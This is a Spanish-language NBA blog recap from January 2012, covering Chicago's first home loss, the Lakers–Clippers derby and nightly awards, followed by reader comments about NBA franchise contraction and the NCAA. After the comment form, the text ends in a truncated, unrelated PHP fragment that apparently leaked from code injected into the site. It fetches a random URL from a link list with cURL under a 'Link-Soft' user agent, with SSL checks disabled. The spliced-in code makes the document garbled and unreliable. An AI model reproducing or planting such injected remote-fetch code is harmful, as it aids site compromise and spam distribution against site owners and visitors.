La Crónica: Nos quedamos sin invictos

26 de January de 2012 por TheDeerHunter

Jornada de alta densidad. Menú para hartarse, con 13 platos de todos los colores, olores y sabores.

La noticia más significativa fue la primera derrota de los Bulls en casa, lo que significa que ya no quedan invictos de ningún tipo. Sufrían la baja de Luol Deng y los problemas que arrastrará Rose todo el curso, pero a cambio disfrutaron de una actuación de Ronnie Brewer completísima. Fallaron por un día los sistemas de Thibodeau y los Pacers encontraron aro demasiado fácil. Ni Rose, ni Boozer, ni Hamilton estuvieron finos. Demasiadas desventajas ante una buena escuadra como la de Vogel (95-90).

Hubo derbi angelino, donde parecía que los Lakers ya no podían ganar a sus vecinos pobres. Lo lograron, noticia, dando una buena imagen colectiva (91-96). Al mejor partido de Pau ,porque así lo quiso Kobe, se unieron Bynum, Fisher y Metta World Peace. La vieja guardia más un excelente Goudelock. Por los Clippers volvía un renqueante Chris Paul y sus bazas se limitaron a Griffin y un poco de Butler y DeAndre más un Mo Will sobreexcitado. Con todo tuvieron el partido en sus manos.

Dos choques se resolvieron con prórroga. Inmensa actuación de D-Will para asaltar el Wells Fargo de Philadelphia (97-90). Sorprendente la resistencia de Toronto en Salt Lake, donde por un día lograron no desperdiciar una ventaja de casi 20 puntos (111-106). Extraordinario el eje extranjero Bargnani-Kleiza-Barbosa más, por un día, una buena impresión con DeRozan.

Se dieron también algunas sorpresas significativas. En Oakland los Blazers se dieron un buen batacazo (93-101). No hubo solución para controlar a Curry. Algo menos sorpresa es que los Knicks den regalos a los equipos más humildes. Fueron los Cavs los beneficiarios de anoche, sin necesidad si quiera de un gran partido de Irving (81-91). Por último, buen leñazo de los Wolves a los campeones, que estuvieron huérfanos sin Nowitzki (105-90). Inmenso Love y Ricky rozando el triple doble. Eso sí, tirándose hasta las zapatillas (mal) y perdiendo balones a capazos. Además los Wizards con entrenador nuevo apalizaron a los Bobcats (75-92). Destacado Andray “se-te-ve-el-plumero” Blatche.

Terminando: Miami ganaron fácil en Detroit a pesar del partidazo de Austin Daye (101-98); los Bucks se llevaron la victoria de Houston tirando de banco (Stephen Jackson-Dunleavy-Ilyasova-Gooden, 105-99); Oklahoma sin problemas ante NOLA (91-101); Denver machacó a Kings (122-93) y los Spurs doblegaron a una versión facilita de los Hawks (83-105).

PREMIOS

MVP: Stephen Curry ha vuelto en plena forma. Actuación muy completa de 32 puntos, 6 rebotes, 7 asistencias y 4 robos. Un pasito por detrás se situaron Deron Williams (34 puntos, 11 asistencias) y Kevin Love (31 puntos y 10 rebotes).

Rookie: Nuevo doble-doble para Ricky Rubio (17 puntos, 12 asistencias, 7 rebotes y 4 robos) pero le pierden las 7 pérdidas y los 12 tiros fallados. Su compañero, Derrick Williams anotó 10 puntos y capturó 6 rebotes. Interesante hoja estadística del checo Jan Vesely: 6 puntos, 6 rebotes y 3 tapones en 19 minutos. Y el rookie de los Lakers, Andrew Goudelock, anotó 14 puntos.

Sorpresa: Increíble partido de Austin Daye. El de los Pistons, que tan mala temporada venía haciendo, se fue a los 28 puntos y 6 rebotes. Igual de sorpredente son los 19 rebotes que capturó Ersan Ilyasova. Por su parte, el mejicano Gustavo Ayón anotó 16 puntos en 17 minutos y el lituano Linas Kleiza fue clave con sus 25 puntos en la victoria de los Raptors.

Decepción: ¿Vale decir los Knicks? Sinó, nos quedamos con la terrible actuación de Lamar Odom, otrora indispensable en los Lakers, que en 16 minutos falló 12 de sus 14 lanzamientos y recibió 5 pinchos de merluza de Darko Milicic.

Esfuerzo en vano: En ausencia de Al Jefferson, Paul Millsap se multiplicó en la zona de los Jazz con 31 puntos y 11 rebotes. Desgraciadamente, no fueron suficientes para doblegar a los Raptors.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

58 comentarios a esta entrada

  1. Denise dice:
    #1

    Ok gracias.

      Citar

  2. Sancho88 dice:
    #2

    Kantonyo: Yo estoy tranquilo, y deberías leer mejor, no he dicho que no sepas de baloncesto…. He dicho que no entiendo como criticas tanto la NCAA si demuestras día a día que no sabes nada de ella, no se me ocurriría a mi criticar la liga de cricket de la India. Por cierto el mismo derecho que tu tienes, o solo tu puedes alzar el tono en los comentarios…

    Hombre, yo no he alzado en ningún momento la voz contra nadie, que yo sepa. Y yo no estoy criticando la liga NCAA, Ponme una sola frase en la que lo haya hecho. Yo he dicho una idea, si no te gusta no hace falta que la comentes y me empieces a decir que si no tengo ni idea. Ok, lo reconozco, no tengo ni idea, porque no me veo partidos de esa liga, pero puedo comentar lo que me apetezca, no tienes tú que decirm lo que puedo o no puedo comentar. Faltaría más

      Citar

  3. Sancho88 dice:
    #3

    kantonyo: Vamos a ver la NCAA es imposible que sea una liga dentro de la NBA… con frases como esta vuelves a demostrar que no tienes ni idea de lo que hablas, cuando citas NCAA, y por eso no entiendo como opinas de esa forma tan a la ligera.

    Sancho88: Él no sabía que los Hornets estaban intervenidos por la NBA, y yo le dije que la solución es reducción de franquicias. Él me dijo que eso no podía ser, y que la solución vendría por darle más protagonismo a otras ligas como la NCAA, NBDL o ABA.

    Tú estás criticando esto que yo he dicho, que no lo he dicho yo, sino mi hermano. Primero lee bien antes de ponerte una bandera de salvador de la NCAA, porque aquí nadie la ha criticado, y yo por supuesto que no lo he hecho. Y puede que mi tono sea un poco chungo, pero cuando se meten con alguien personalmente, a mí me parece que me has intentado descalificar, y no me ha molado nada lo que has dicho de mi, sobre todo porque yo en ningún momento he criticado lo que tu dices, ni se me ocurriría meter la NCAA en la NBA

      Citar

  4. Sancho88 dice:
    #4

    Sancho88:
    Por cierto, esta tarde hablábamos mi tato mellizo y yo sobre la liga. Él no sabía que los Hornets estaban intervenidos por la NBA, y yo le dije que la solución es reducción de franquicias. Él me dijo que eso no podía ser, y que la solución vendría por darle más protagonismo a otras ligas como la NCAA, NBDL o ABA. Me dijo que estaría bien que los dos o tres peores equipos de la temporada descendieran a otra categoría, y subiesen dos o tres desde otras ligas. Me pareció una idea muy respetable. Desde luego, alguna fórmula original tienen que sacarse para renovar una liga en crisis. Incluso, yo propondría que los dos-tres peores bajasen a otra categoría, y metieran a los finalistas de la Euroliga. Sé que es una idea revolucionaria y que seguramente a todos os parecerá mal, pero a mí, personalmente, me da vergüenza ver a los Bobcats, Kings con niños de 20 años porque no tienen pasta para más, Pistons, etc. Y lo digo basándome únicamente en la situación actual de crisis y el juego que dan estos equipos en los últimos años, sin aspirar a nada ni siquiera aunque se piyen a un megacrack, ya que cuando cumpla su contrato de rookie se irá a los equipos de siempre. Un ejemplo son los Cavs. Quiero decir, que la idiosincracia de la liga no da para 30 equipos. Yo preferiría la reducción de franquicias que esta medida de ascender o descender equipos

    En qué línea critico la NCAA<?? Y sí, pienso que CSK, Macabbi y Barsa podrían dar lustre a la liga, y que los Bobcats y equipos así no pintan nada. Podría ser una idea de expansión de mercado. Y no es ninguna locura ni ningún desconocimiento de la liga, porque Stern ya lo ha propuesto

      Citar

  5. Ru dice:
    #5

    Comentario 41,lista de valor de las franquicias y afluencia a los pabellones de cada equipo 😀

    Sobre las franquicias europeas…si bien en algún momento me parecía algo totalmente viable,creo que hoy día tal como está la economía,dista mucho de hablar de ello como una posibilidad real.

      Citar

  6. melo15 dice:
    #6

    pero y las reglas?? como ya habeis dicho muchas veces, las regles de la NBA estan puestas para que los jugadores aprovechen su fisico, ademas no creo que los jugadores puedan aguantar un calendario tan exigente

      Citar

  7. Kantonyo dice:
    #7

    Sancho88: Yo creo que no hay debate posible. Salvo alguna bacalá royo Charleroi-Brose Baskets, el resto de partidos son de un nivel muy superior. Vamos, para mí el termómetro sería pone dos pantallas, en una un partizan-olympiakos, efes-baskonia o barcelona-montepaschi, y en la otra un partido universitario estadounidense, y reunirnos todos a verlos, teniendo que elegir entre uno de ellos. No hay color… y quien diga lo contrario, me chupa la pija por detrás de mi culo, viejo

    Pues entonces no me cuadra el comentario este del otro día, donde hablas con tanta seguridad.Tu puedes comentar lo que quieras, pero yo también puedo opinar, y si tu hablas de esa forma yo tb puedo ser categórico en mis afirmaciones, aunque reconozco que no son apropiadas, cuando digo que no tienes ni idea de NCAA. Pero lo digo de esa forma, por que molesta que afirmes con tanta rotundidad que no hay color, cuando luego veo comentarios tuyos que me dan la sensación que no sabes de que hablas. Al contrario cuando te veo hablar de NBA no me cuesta mucho ver el nivel de tus conocimientos sobre el juego, jugadores, equipos etc…

    De una manera constructiva, y sin pretender convencerte de nada, además viendo tu pasión por el basket, te invito a que poco a poco te vayas empapando de lo que es la NCAA.

      Citar

  8. Kantonyo dice:
    #8

    Ru:
    ¿Y qué pasaría con los jugadores de esos equipos que desaparecen?¿Agentes libres sin restricciones,aceptando la oferta del mejor postor?¿Una especie de minidraft fantasy?

    Sacramento Kings y New Orleans,por los problemas económicos,Toronto Raptors,por la dificultad de retener a las estrellas y las diferencias fiscales respecto a EEUU,Charlotte Bobcats y Milwaukee porque no atraen la suficiente atención,y Memphis,que hasta hace relativamente poco siempre aparecían en estas listas hipotéticas.Esas son mis elegidas,3 del oeste y 3 del este.

    Os dejo un par de enlaces,uno con la lista de afluencia de público a los pabellones( http://espn.go.com/nba/attendance/_/sort/awayAvg ) y otro con el valor de la franquicia ( http://www.forbes.com/nba-valuations/list/ ) por si quereis seguir divagando ocn el tema.

    Me sorprende bastante como Portland es de las franquicias que mas gente lleva a su estadio y por otra parte de las que menos gente congrega en sus desplazamiento en las canchas de sus rivales…. Será por el juego tan coñazo de McMillan.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>